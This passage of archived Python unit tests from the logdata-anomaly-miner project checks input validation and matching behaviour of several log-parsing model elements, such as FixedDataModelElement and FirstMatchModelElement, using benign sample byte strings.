"""Check if element_id is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, "", self.delimiter) # empty element_id self.assertRaises(TypeError, DelimitedDataModelElement, None, self.delimiter) # None element_id self.assertRaises(TypeError, DelimitedDataModelElement, b"path", self.delimiter) # bytes element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, True, self.delimiter) # boolean element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123, self.delimiter) # integer element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, 123.22, self.delimiter) # float element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, {"id": "path"}, self.delimiter) # dict element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, ["path"], self.delimiter) # list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, [], self.delimiter) # empty list element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, (), self.delimiter) # empty tuple element_id is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, set(), self.delimiter) # empty set element_id is not allowed def test10escape_input_validation(self): """Check if escape is validated.""" self.assertRaises(ValueError, DelimitedDataModelElement, self.id_, self.delimiter, escape=b"") # empty escape self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape="\\") # string escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=True) # boolean escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123) # integer escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=123.22) # float escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape={"id": "path"}) # dict escape not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=["path"]) # list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=[]) # empty list escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=()) # empty tuple escape is not allowed self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, escape=set()) # empty set escape is not allowed def test11consume_delimiter_input_validation(self): """Check if consume_delimiter is validated.""" self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=b"") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter="\\") self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=123.22) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter={"id": "path"}) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=["path"]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=[]) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=()) self.assertRaises(TypeError, DelimitedDataModelElement, self.id_, self.delimiter, consume_delimiter=set()) def test12get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = DelimitedDataModelElement(self.id_, self.delimiter) data = b"one, two, three" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/ElementValueBranchModelElementTest.py000066400000000000000000000312041500476301700326340ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class ElementValueBranchModelElementTest(TestBase): """Unittests for the ElementValueBranchModelElement.""" id_ = "value_branch" path = "path" value_path = "value_model" path_path = b"path: " data_path = b"data: " path_fixed_string = b"/model" data_fixed_string = b"this is some random data: 255." value_model = DummyFirstMatchModelElement( "branch", [DummyFixedDataModelElement("path", path_path), DummyFixedDataModelElement("data", data_path)]) path_me = DummyFixedDataModelElement(value_path, path_fixed_string) data_me = DummyFixedDataModelElement(value_path, data_fixed_string) children = [value_model, path_me, data_me] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/path", self.path_path, self.path_path, None), MatchElement("path/value_branch/value_model", self.path_fixed_string, self.path_fixed_string, None)]) data = b"data: this is some random data: 255." match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ MatchElement("path/value_branch/branch/data", self.data_path, self.data_path, None), MatchElement("path/value_branch/value_model", self.data_fixed_string, self.data_fixed_string, None)]) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" element_value_branch_me = ElementValueBranchModelElement( self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"path: /random" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: this is some random data: 255." match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: /model" match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"path: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"data: " match_context = DummyMatchContext(data) match_element = element_value_branch_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, "", self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, None, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, b"path", self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, True, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, 123.22, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, {"id": "path"}, self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, ["path"], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, [], self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, (), self.value_model, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, set(), self.value_model, None, branch_model_dict) def test4value_model_input_validation(self): """Check if value_model is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, "path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, None, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, b"path", None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, 123.22, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, True, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, {"id": "path"}, None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, ["path"], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, [], None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, (), None, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, set(), None, branch_model_dict) def test5value_path_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(ValueError, ElementValueBranchModelElement, self.id_, self.value_model, "", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, b"path", branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, True, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, 123.22, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, {"id": "path"}, branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, ["path"], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, [], branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, (), branch_model_dict) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, set(), branch_model_dict) def test6branch_model_dict_input_validation(self): """Check if value_path is validated.""" self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, None) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, 123.22) # dict branch_model_dict without ModelElementInterface values is not allowed self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, set()) def test7default_branch_input_validation(self): """Check if value_path is validated.""" branch_model_dict = {"path: ": self.path_me, "data: ": self.data_me} self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, "path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, b"path") self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, True) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, 123.22) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, {"id": "path"}) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ["path"]) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, []) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, ()) self.assertRaises(TypeError, ElementValueBranchModelElement, self.id_, self.value_model, None, branch_model_dict, set()) def test8get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = ElementValueBranchModelElement(self.id_, self.value_model, None, {"path: ": self.path_me, "data: ": self.data_me}) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FirstMatchModelElementTest.py000066400000000000000000000174771500476301700312140ustar00rootroot00000000000000import unittest from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class FirstDataModelElementTest(TestBase): """Unittests for the FirstDataModelElement.""" id_ = "first" path = "path" me1 = DummyFixedDataModelElement("me1", b"The first fixed string.") me2 = DummyFixedDataModelElement("me2", b"Random string23.") me3 = DummyFixedDataModelElement("me3", b"Random string2") children = [me1, me2, me3] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"The first fixed string. Random string23." value = b"The first fixed string." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/me1", self.path, value, value, None) data = b"Random string23. Random string23." value = b"Random string23." match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me2", self.path, value, value, None) data = b"Random string2 Random string23." value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) data = b"Random string24. Random string23." value = b"Random string2" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/me3", self.path, value, value, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"some none matching string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"The first fixed string" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"Random string42" match_context = DummyMatchContext(data) first_match_me = FirstMatchModelElement(self.id_, self.children) match_element = first_match_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FirstMatchModelElement, "", self.children) # empty element_id self.assertRaises(TypeError, FirstMatchModelElement, None, self.children) # None element_id self.assertRaises(TypeError, FirstMatchModelElement, b"path", self.children) # bytes element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, True, self.children) # boolean element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123, self.children) # integer element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, 123.22, self.children) # float element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, {"id": "path"}, self.children) # dict element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, ["path"], self.children) # list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, [], self.children) # empty list element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, (), self.children) # empty tuple element_id is not allowed self.assertRaises(TypeError, FirstMatchModelElement, set(), self.children) # empty set element_id is not allowed def test4children_input_validation(self): """Check if children is validated.""" self.assertRaises(TypeError, FirstMatchModelElement, self.id_, "path") # string children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, None) # None children self.assertRaises(TypeError, FirstMatchModelElement, self.id_, b"path") # bytes children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, True) # boolean children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123) # integer children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, 123.22) # float children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, {"id": "path"}) # dict children is not allowed # list children with no ModelElementInterface elements is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, ["path"]) self.assertRaises(ValueError, FirstMatchModelElement, self.id_, []) # empty list children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, ()) # empty tuple children is not allowed self.assertRaises(TypeError, FirstMatchModelElement, self.id_, set()) # empty set children is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FirstMatchModelElement(self.id_, self.children) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FixedDataModelElementTest.py000066400000000000000000000133401500476301700307620ustar00rootroot00000000000000import unittest from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class FixedDataModelElementTest(TestBase): """Unittests for the FixedDataModelElement.""" data = b"fixed data. Other data." id_ = "fixed" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with the fixed string.""" fixed_string = b"fixed data." fixed_dme = FixedDataModelElement(self.id_, fixed_string) match_context = DummyMatchContext(self.data) match_element = fixed_dme.get_match_element(self.path, match_context) self.compare_match_results(self.data, match_element, match_context, self.id_, self.path, fixed_string, fixed_string, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" no_match_string = b"Hello World." match_context = DummyMatchContext(self.data) fixed_dme = FixedDataModelElement(self.id_, no_match_string) match_element = fixed_dme.get_match_element(self.path, match_context) self.compare_no_match_results(self.data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedDataModelElement, "", self.data) # empty element_id self.assertRaises(TypeError, FixedDataModelElement, None, self.data) # None element_id self.assertRaises(TypeError, FixedDataModelElement, b"path", self.data) # bytes element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, True, self.data) # boolean element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, 123, self.data) # integer element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, 123.22, self.data) # float element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, {"id": "path"}, self.data) # dict element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, ["path"], self.data) # list element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, [], self.data) # empty list element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, (), self.data) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedDataModelElement, set(), self.data) # empty set element_id is not allowed def test4fixed_data_input_validation(self): """Check if fixed_data is validated.""" self.assertRaises(ValueError, FixedDataModelElement, self.id_, b"") # empty fixed_string self.assertRaises(TypeError, FixedDataModelElement, self.id_, None) # None fixed_string self.assertRaises(TypeError, FixedDataModelElement, self.id_, "path") # string fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, True) # boolean fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, 123) # integer fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, 123.22) # float fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, {"string": "string"}) # dict fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, ["path"]) # list fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, []) # empty list fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, ()) # empty tuple fixed_string is not allowed self.assertRaises(TypeError, FixedDataModelElement, self.id_, set()) # empty set fixed_string is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedDataModelElement(self.id_, self.data) data = self.data model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/FixedWordlistDataModelElementTest.py000066400000000000000000000170371500476301700325210ustar00rootroot00000000000000import unittest from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class FixedWordlistDataModelElementTest(TestBase): """Unittests for the FixedWordlistDataModelElement.""" id_ = "wordlist" path = "path" wordlist = [b"wordlist", b"word"] def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"wordlist, word" index = 0 value = b"wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) data = b"word, wordlist" index = 1 value = b"word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, index, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"string wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"wor wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"0 wordlist" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"1 word" match_context = DummyMatchContext(data) fixed_wordlist_dme = FixedWordlistDataModelElement(self.id_, self.wordlist) match_element = fixed_wordlist_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, FixedWordlistDataModelElement, "", self.wordlist) # empty element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, None, self.wordlist) # None element_id self.assertRaises(TypeError, FixedWordlistDataModelElement, b"path", self.wordlist) # bytes element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, True, self.wordlist) # boolean element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123, self.wordlist) # integer element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, 123.22, self.wordlist) # float element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, {"id": "path"}, self.wordlist) # dict element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, ["path"], self.wordlist) # list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, [], self.wordlist) # empty list element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, (), self.wordlist) # empty tuple element_id is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, set(), self.wordlist) # empty set element_id is not allowed def test4wordlist_input_validation(self): """Check if wordlist is validated.""" self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, "path") # string wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, None) # None wordlist self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, b"path") # bytes wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, True) # boolean wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123) # integer wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, 123.22) # float wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, {"id": "path"}) # dict wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ["path", "path2"]) # list wordlist with strings not allowed self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"word", b"path", b"path-like"]) # wrong word order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, [b"wordlist", b"word", b"word dictionary"]) # wrong order self.assertRaises(ValueError, FixedWordlistDataModelElement, self.id_, []) # empty list wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, ()) # empty tuple wordlist is not allowed self.assertRaises(TypeError, FixedWordlistDataModelElement, self.id_, set()) # empty set wordlist is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = FixedWordlistDataModelElement(self.id_, self.wordlist) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/HexStringModelElementTest.py000066400000000000000000000215511500476301700310470ustar00rootroot00000000000000import unittest from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class HexStringModelElementTest(TestBase): """Unittests for the HexStringModelElement.""" id_ = "hex" path = "path" def test1get_match_element_valid_match(self): """Try all values and check if the desired results are produced.""" allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"a", b"b", b"c", b"d", b"e", b"f"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = 